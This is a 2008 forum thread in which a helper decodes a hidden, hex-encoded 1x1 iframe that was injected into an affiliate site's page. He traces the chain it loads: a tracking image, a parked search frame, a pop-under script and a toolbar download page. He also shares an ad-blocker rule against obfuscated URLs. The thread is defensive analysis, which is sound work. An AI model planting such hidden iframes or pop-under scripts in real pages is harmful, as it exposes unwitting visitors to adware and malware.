       <<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"25%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CA00CA" </span><span class="attribute-name">height</span>=<span class="attribute-value">"34"</span>>&<span class="entity">nbsp;</span></<span class="end-tag">td</span>>
       <<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"25%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CA00CA" </span><span class="attribute-name">height</span>=<span class="attribute-value">"34"</span>>&<span class="entity">nbsp;</span></<span class="end-tag">td</span>>
</pre><pre id="line192">    </<span class="end-tag">tr</span>>
     <<span class="start-tag">tr</span>>
       <<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"25%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CA00CA" </span><span class="attribute-name">height</span>=<span class="attribute-value">"34"</span>>&<span class="entity">nbsp;</span></<span class="end-tag">td</span>>
       <<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"25%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CA00CA" </span><span class="attribute-name">height</span>=<span class="attribute-value">"34"</span>>&<span class="entity">nbsp;</span></<span class="end-tag">td</span>>
       <<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"25%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CA00CA" </span><span class="attribute-name">height</span>=<span class="attribute-value">"34"</span>>&<span class="entity">nbsp;</span></<span class="end-tag">td</span>>
       <<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"25%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CA00CA" </span><span class="attribute-name">height</span>=<span class="attribute-value">"34"</span>>&<span class="entity">nbsp;</span></<span class="end-tag">td</span>>
     </<span class="end-tag">tr</span>>
   </<span class="end-tag">table</span>>
   </<span class="end-tag">center</span>>
</pre><pre id="line201"></<span class="end-tag">div</span>>

<<span class="start-tag">center</span>>
<<span class="start-tag">script</span><span class="attribute-name"> language</span>=<span class="attribute-value">"JavaScript" </span><span class="attribute-name">type</span>=<span class="attribute-value">"text/javascript"</span>>
<!--
ctxt_ad_partner = "1060495770";
ctxt_ad_section = "";
ctxt_ad_bg = "";
ctxt_ad_width = 728;
ctxt_ad_height = 90;
ctxt_ad_bc = "CC33CC";
ctxt_ad_cc = "333333";
ctxt_ad_lc = "CC66FF";
ctxt_ad_tc = "33FF33";
ctxt_ad_uc = "FFFFFF";
// -->
</<span class="end-tag">script</span>>
<<span class="start-tag">script</span><span class="attribute-name"> language</span>=<span class="attribute-value">"JavaScript" </span><span class="attribute-name">src</span>=<span class="attribute-value">"http://ypn-js.overture.com/partner/js/ypn.js"</span>>
</<span class="end-tag">script</span>>
<<span class="start-tag">td</span><span class="attribute-name"> valign</span>=<span class="attribute-value">"top" </span><span class="attribute-name">colspan</span>=<span class="attribute-value">"4"</span>><<span class="start-tag">table</span><span class="attribute-name"> width</span>=<span class="attribute-value">"100%" </span><span class="attribute-name">border</span>=<span class="attribute-value">"0" </span><span class="attribute-name">cellspacing</span>=<span class="attribute-value">"0" </span><span class="attribute-name">cellpadding</span>=<span class="attribute-value">"0" </span><span class="attribute-name">name</span>=<span class="attribute-value">"Divider Bar"</span>><<span class="start-tag">tr</span>><<span class="start-tag">td</span><span class="attribute-name"> align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">background</span>=<span class="attribute-value">"http://www.exciteptr.com/pages/starryBackround.gif" </span><span class="attribute-name">bgcolor</span>=<span class="attribute-value">"#626FB7"</span>><<span class="start-tag">img</span><span class="attribute-name"> src</span>=<span class="attribute-value">"http://www.exciteptr.com/pages/starryBackround.gif" </span><span class="attribute-name">width</span>=<span class="attribute-value">"15" </span><span class="attribute-name">height</span>=<span class="attribute-value">"21"</span>></<span class="end-tag">td</span>></<span class="end-tag">tr</span>></<span class="end-tag">table</span>></<span class="end-tag">td</span>>

</<span class="end-tag">tr</span>><<span class="start-tag">tr</span>>

<<span class="start-tag">td</span><span class="attribute-name"> valign</span>=<span class="attribute-value">"top" </span><span class="attribute-name">colspan</span>=<span class="attribute-value">"4"</span>>
<<span class="start-tag">br</span>>
  
<<span class="start-tag">center</span>>
<<span class="start-tag">p</span>>Powered by <<span class="start-tag">a</span><span class="attribute-name"> href</span>=<span class="attribute-value">http://cashcrusader.myecom.net</span>>CashCrusader Affiliate Tracking
software</<span class="end-tag">a</span>><<span class="start-tag">br</span>>All Rights Reserved. 2005-2006  
exciteptr.com
| Designed by: EzMarketing Enterprises</<span class="end-tag">a</span>></<span class="end-tag">p</span>></<span class="end-tag">td</span>></<span class="end-tag">center</span>>
</pre><pre id="line232"></<span class="end-tag">tr</span>></<span class="end-tag">table</span>></<span class="end-tag">td</span>>

</<span class="end-tag">tr</span>><<span class="start-tag">tr</span>>

<<span class="start-tag">td</span><span class="attribute-name"> align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">colspan</span>=<span class="attribute-value">"4"</span>><span class="comment"><!--Leave this cell empty --></span></<span class="end-tag">td</span>>
</<span class="end-tag">tr</span>></<span class="end-tag">table</span>>
</<span class="end-tag">body</span>></<span class="end-tag">html</span>>

</pre>
jlandis
Aug 13 2008, 04:28 PM
QUOTE (longshanks1971 @ Aug 13 2008, 08:41 AM) *
The frame producing the alert is;

CODE
<pre id="line47"><<span class="start-tag">iframe</span><span class="attribute-name"> src</span>=<span class="attribute-value">http://%75%6E%6F%74%6D%65%2E%69%6E%66%6F/%73%70/%69%6E%64%65%78%2E%70%68%70 </span><span class="attribute-name">width</span>=<span class="attribute-value">1 </span><span class="attribute-name">height</span>=<span class="attribute-value">1 </span><span class="attribute-name">frameborder</span>=<span class="attribute-value">0</span>></<span class="end-tag">iframe</span>></pre>


I didn't scan the entire source code, but I can walk you through the iframe. Wear boots. aa.gif

The URL http:// %75%6E%6F%74%6D%65%2E%69%6E%66%6F/%73%70/%69%6E%64%65%78%2E%70%68%70 is hex encoded, and decodes to http:// unotme.info/sp/index.php (I decode hex at the Manual Entry section at http://www.gooby.ca/decrypt -- excellent set of decoding tools. I also use http://www.greymagic.com/security/tools/decoder -- again excellent.)

To prevent damage from malware URLs obfuscated in this way, I stop them from loading with this entry in my AdBlockPlus: http://%

That entry hasn't interfered with anything I want to load, and I'd recommend it.

I'll go ahead and post this and return with the next steps. Thanks for catching this and posting it.





jlandis
Aug 13 2008, 04:49 PM
unotme.info/sp/index.php

CODE
<title>unotme.info</title>
<script type="text/javascript">
a = "/img/trans.1x1.g";
b = "if?p=frm";
c = new Image();
c.src = a+b;
</script>
</head>
<frameset rows="100%,*" frameborder="no" border="0" framespacing="0">
<frame src="http://searchportal.information.com/?o_id=65014&domainname=unotme.info">
<frame src="/pp/t.html"></frameset>
<noframes>
<body bgcolor="#ffffff" text="#000000">
    <a href="http://searchportal.information.com/?o_id=65014&domainname=unotme.info">Click here to enter</a>.


That loads:

unotme.info/img/trans.1x1.gif?p=frm (source code is empty at the moment)
searchportal.information.com/?o_id=65014&domainname=unotme.info (parked domain page, often run in hidden iframes to dilute fraudulent searches, rendering them less detectable)
unotme.info/pp/t.html

unotme.info/pp/t.html

CODE
<script type="text/javascript">
var u = "/tool"+"bar.htm";
var w = '690';
var h = '320';
var wV = 'scrollbars=no,resizable=yes,toolbar=no,' + 'menubar=no,status=no,location=no,height=' + h + ',width=' + w;
tW=window.open(u, "tWin", wV);
if (null !== tW) {
  tW.blur();
  window.focus();
}
</script>


That loads unotme.info/toolbar.htm

CODE
<a href="http://www.toolbarbrowser.com/index.html?id=70480" target="_blank"><b>ToolbarBrowser - FREE Custom Search Toolbar</b></a>
<br><br>
</td></tr><tr><td colspan=2>
<a href="http://www.toolbarbrowser.com/index.html?id=70480" target="_blank">
<img border=0 src="http://www.trellian.com/img/tb.png" border=0 align=left style="border:1px solid #A9ACBB">
</a>
</td></tr><tr><td>
<font face=arial size=-1>
<br>
<li> Manage your Explorer Toolbars in a tabbed window to save space.
<li> Design your own FREE custom toolbar.
</td><td align=right>
<font face=arial size=-1>
<a href="http://www.toolbarbrowser.com/index.html?id=70480" target="_blank"><b>Download Now!!!</b></a> | <a href="http://www.toolbarbrowser.com/index.html?id=70480" target="_blank"><b>More Info</b></a>
</font>
</td></tr></table>
</td></tr></table>
<br><br><font face=verdana size=-1>
  <p><a href="http://www.trellian.com/seotoolkit" target=_blank><IMG align=bottom SRC="http://www.trellian.com/img/buttons/seonow.png" ALT="Trellian - SEO Toolkit" border="0"></a><br>
<b>  <a href="http://www.trellian.com/seotoolkit/?id=70480" target=_blank>SEO Toolkit - Optimize your website, attract new visitors ...</a></b>
longshanks1971
Aug 14 2008, 09:55 AM
Thanks very much for all your help, the adblock tip could save a lot of people getting hit by nasties and I'll be adding it in a moment.

I have tried decoding with gooby with no sucess before so but your post has shown me where I have gone wrong, so I'm off to have another go with that.

It's slowly starting to make sense - so thank you for all your help and information.

Craig
jlandis
Aug 14 2008, 04:12 PM
QUOTE (longshanks1971 @ Aug 14 2008, 08:55 AM) *
Thanks very much for all your help, the adblock tip could save a lot of people getting hit by nasties and I'll be adding it in a moment.


I think it's a worthwhile step. We've seen enough Trojan URLs obfuscated this way to make it sensible, and it doesn't interfere with anything it shouldn't. I just checked the stats, and my AdBlock has stopped URLs like this 33 times.

QUOTE (longshanks1971 @ Aug 14 2008, 08:55 AM) *
I have tried decoding with gooby with no sucess before so but your post has shown me where I have gone wrong, so I'm off to have another go with that.


I'm pleased it's useful information, because Gooby Tools is a valuable resource. If you want to see a full page using URL Entry section, first try setting the Decoder to Use dropdown box to Hex Decoder. It's very rare you'd need the other decoder options. The Manual Entry section is helpful when you have specific bits of code to check, especially when you see lots of % signs in it (that's the tip it's straight-up hex encoding).

QUOTE (longshanks1971 @ Aug 14 2008, 08:55 AM) *
It's slowly starting to make sense - so thank you for all your help and information.


You're very welcome. The more people there are interested and equipped to help, the easier and safer it is for all of us.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2012 Invision Power Services, Inc.